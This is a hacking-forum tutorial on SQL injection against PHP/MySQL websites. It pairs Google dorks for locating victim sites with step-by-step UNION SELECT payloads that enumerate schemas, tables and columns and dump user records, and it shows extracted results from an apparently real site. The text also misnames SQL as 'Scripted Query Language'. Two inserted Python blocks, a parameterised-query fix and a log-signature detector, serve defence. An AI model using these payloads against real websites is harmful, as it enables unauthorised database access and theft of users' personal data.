Full SQL Injection Tutorial By JinX!
Hello everyone,
This is JinX! from Pakistan Cyber Pythons.
Today I am going to teach you "SQL INJECTION". Let's begin.
First of all, you need to know what SQL means.
SQL means "SCRIPTED QUERY LANGUAGE", and it helps in making the database of a web application.
Step 1: HOW TO CHECK THE VULNERABILITY:
We find vulnerable websites via GOOGLE DORKS. Google dorks are simply search operators that help us refine a search and find websites.
SOME GOOGLE DORKS LISTED BELOW:
- inurl:index.php?id=
- inurl:cart.php?id=
- inurl:news_view.php?id=
- inurl:faq.php?id=
- inurl:products.php?id=
Now suppose you get a website with one of the dorks above, and its address looks something like this:
http://www.victimsite.com/index.php?id=10
What you need to do now is put an apostrophe ( ' ) at the end of the URL, as I do below.
http://www.victimsite.com/index.php?id=10'
If the page returns an SQL error, the page is vulnerable to SQLi. If it loads normally, leave the page and move on to the next site in the search result.
Typical errors you'll get after appending the apostrophe are:
Warning: mysql_fetch_array():
Warning: mysql_fetch_assoc():
Warning: mysql_numrows():
Warning: mysql_num_rows():
Warning: mysql_result():
Warning: mysql_preg_match():
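Why the apostrophe produces an error, and what removes the flaw, shown as an added example that is not part of the original tutorial. It uses SQLite from Python's standard library instead of the PHP/MySQL stack behind the warnings above; the table names, rows and function names are constructed for the illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory database standing in for the site's backend."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news  (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, password TEXT);
        INSERT INTO news  VALUES (10, 'Welcome');
        INSERT INTO users VALUES (1, 'constructed-secret');
    """)
    return db

def lookup_vulnerable(db, raw_id):
    # "Before" pattern: the id parameter is pasted into the SQL text, so a
    # quote or keyword inside it is parsed as part of the statement.
    sql = "SELECT id, title FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def lookup_hardened(db, raw_id):
    # Reject anything that is not a plain integer, then bind the value with a
    # placeholder; bound data is never re-parsed as SQL.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 18):
        return []
    return db.execute("SELECT id, title FROM news WHERE id = ?",
                      (int(raw_id),)).fetchall()

def probe(lookup, raw_id):
    """Run one lookup on a fresh database; report rows or the error class only."""
    try:
        return ("rows", lookup(make_db(), raw_id))
    except sqlite3.Error as exc:
        # Log the detail server-side; never echo driver errors to the client.
        return ("error", type(exc).__name__)

if __name__ == "__main__":
    for value in ("10", "10'", "-10 union select 1,password from users"):
        print(repr(value), probe(lookup_vulnerable, value),
              probe(lookup_hardened, value))
```

With the bound parameter, the apostrophe and the union request both come back as an empty result instead of an error page or another table's rows.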
Step 2: ENUMERATE THE NUMBER OF COLUMNS:
Once you find a vulnerable site, you need to enumerate the number of columns and those columns that are accepting the queries from you.
Append an 'order by' statement to the URL.
EG. http://www.victimsite.com/index.php?id=10 order by 1
Keep increasing the number until you get an SQL error. The highest number for which you do not get an error is the number of columns in the table.
Step 3: UNION SELECT QUERY TO FIND WHICH COLUMNS ACCEPT QUERIES:
Append a 'union select' statement to the URL. Also precede the number after "id=" with a hyphen or minus.
Say from the above step, you got that the table has 6 columns.
eg. hxxp://www.abcd.com/index.php?catid=-1 union select 1,2,3,4,5,6
The result of this query will be the numbers of the columns that are accepting the queries. Say we get 2,3,4 as the result. Now we'll inject our SQL statements in one of these columns.
Step 4: Enumerating the SQL version
We'll use the MySQL command @@version or version() to get the version of the db. We have to inject the command in one of the open columns. Say we use column number 2.
eg. http://www.victimsite.com/index.php?id=-10 union select 1,@@version,3,4,5,6
You'll get the version of the database in the place where you had got the number 2. If the version number starts with 5 or more, then you are good to go. If it is less, move on to another site.
Step 5: Exploit
To get list of databases:
http://www.victimsite.com/index.php?id=-10 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--
The result will display a list of databases on the site. From here on, we'll write the results we got from our test.
Result: information_schema,vrk_mlm
To know the current database in use:
http://www.victimsite.com/index.php?id=-10 union select 1,concat(database()),3,4,5,6--
Result: vrk_mlm
To get the current user:
http://www.victimsite.com/index.php?id=-10 union select 1,concat(user()),3,4,5,6--
Result: vrk_4mlm@localhost
To get the tables:
http://www.victimsite.com/index.php?id=-10 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--
Result: administrator,category,product,users
We'll concentrate our attack on the users table.
To get the columns:
http://www.victimsite.com/index.php?id=-10 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--
Result: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,
prodKeyword,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,
refered_direct_to_ids,refered_to_ids,no_of_direct_referals,credits,position,
email_id,password,edited_on,last_login,created_on,chain_number,phone,address
By looking closely at the columns and the order of the tables, we can conclude that the columns starting from id,incredible_id belong to the users table, and those are the ones we are interested in.
Extract information:
union select group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refered_by_id,0x3a,refered_direct_to_ids,0x3a) from vrk_mlm.users--
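The requests in Steps 1 to 5 leave a recognisable trail in a web server's access log. The following is an added example, not part of the original tutorial, of flagging that trail per client; the log lines, IP addresses and signature names are constructed, and the log layout is assumed to be the common combined format.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signatures for the request shapes the tutorial's steps leave in a log.
SIGNATURES = {
    "quote_probe":   re.compile(r"^-?\d+'$"),                             # Step 1
    "order_by":      re.compile(r"\border\s+by\s+\d+", re.I),             # Step 2
    "union_select":  re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),  # Step 3
    "version_probe": re.compile(r"@@version|\bversion\s*\(", re.I),       # Step 4
    "schema_enum":   re.compile(r"\binformation_schema\b", re.I),         # Step 5
}
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed access-log lines (documentation IP ranges, made-up paths).
T = "[01/Jan/2024:10:00:00 +0000]"
SAMPLE_LOG = [
    f'203.0.113.7 - - {T} "GET /index.php?id=10 HTTP/1.1" 200 512',
    f'198.51.100.9 - - {T} "GET /index.php?id=10%27 HTTP/1.1" 500 120',
    f'198.51.100.9 - - {T} "GET /index.php?id=10%20order%20by%207 HTTP/1.1" 500 120',
    f'198.51.100.9 - - {T} "GET /index.php?id=-10+union+select+1,@@version,3,4,5,6 HTTP/1.1" 200 530',
    f'198.51.100.9 - - {T} "GET /index.php?id=-10%20union%20select%201,group_concat(schema_name),3,4,5,6%20from%20information_schema.schemata-- HTTP/1.1" 200 540',
    f'203.0.113.7 - - {T} "GET /faq.php?id=3 HTTP/1.1" 200 400',
]

def classify(line):
    """Return (client_ip, sorted signature names) or None for a clean line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hits = set()
    # parse_qsl percent-decodes values, so %27, %20 and '+' are normalised.
    for _, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        hits.update(name for name, rx in SIGNATURES.items() if rx.search(value))
    return (m["ip"], sorted(hits)) if hits else None

def scan(lines):
    """Group signature hits per client so one probing source stands out."""
    per_ip = {}
    for line in lines:
        hit = classify(line)
        if hit:
            per_ip.setdefault(hit[0], set()).update(hit[1])
    return {ip: sorted(names) for ip, names in per_ip.items()}

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

Signature matching like this is a triage aid for logs and WAF rules; it does not replace binding parameters in the application's queries.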
That's all about SQL INJECTION. Comment below or give us your feedback on Facebook.
Special thanks to: Mad Jack, Napster Dotnet, and of course me for writing this article :D
Good Luck
NOTE: Only for educational purposes :)
If you guys have any query, you can contact me at my Facebook page
or by email:
it's jinx.stewart@yahoo.com